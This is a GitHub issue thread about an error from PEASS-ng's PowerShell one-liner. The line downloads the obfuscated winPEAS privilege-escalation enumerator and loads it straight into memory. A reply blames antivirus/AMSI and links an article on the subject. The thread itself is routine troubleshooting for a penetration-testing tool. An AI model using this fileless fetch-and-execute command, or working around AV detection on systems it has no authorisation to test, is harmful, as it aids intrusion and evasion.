### ISSUE TITLE
Could not load file or assembly with One liner to download and execute winPEASany from memory in a PS shell?

### ISSUE THREAD

**Issue by BrainMarine** [carlospolop/PEASS-ng#388]
#### Issue description
Issue with One liner to download and execute winPEASany from memory in a PS shell.

#### Steps to reproduce the issue

1.  PS C:\Users\BrainMarine> $url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
2.  PS C:\Users\BrainMarine> $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2235392 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."

#### Which parameters did you use for executing the script and how did you execute it?

![image](https://github.com/carlospolop/PEASS-ng/assets/40487931/65c9f129-89d0-4938-afb1-1b83d8098226)

#### If winpeas, did you use a clean or obfuscated winpeas, and for which architecture?
I used the obfuscated version online at https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe

#### Is there any AV / Threat protection in the system?
Yes but i run it in a whitelisted folder

#### Please, indicate the OS, the OS version, and the kernel version (build number in case of Windows)
![image](https://github.com/carlospolop/PEASS-ng/assets/40487931/8bfdc1c2-9925-471c-acb1-6e139bcfe342)

#### Please, indicate the check that is failing and add a screenshot showing the problem
Please see screenshot posted above

#### How did you expect it to work?
Was expecting to work but I got an error.

Exception calling "Load" with "1" argument(s): "Could not load file or assembly '2235392 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."

#### Additional details / screenshot

![image](https://github.com/carlospolop/PEASS-ng/assets/40487931/65c9f129-89d0-4938-afb1-1b83d8098226)

**Comment by shaaati** [comment]
I had this happen a lot, too and started searching for reasons.

TL;DR: Turns out if you think it's not AV, it's most likely still AV: https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/
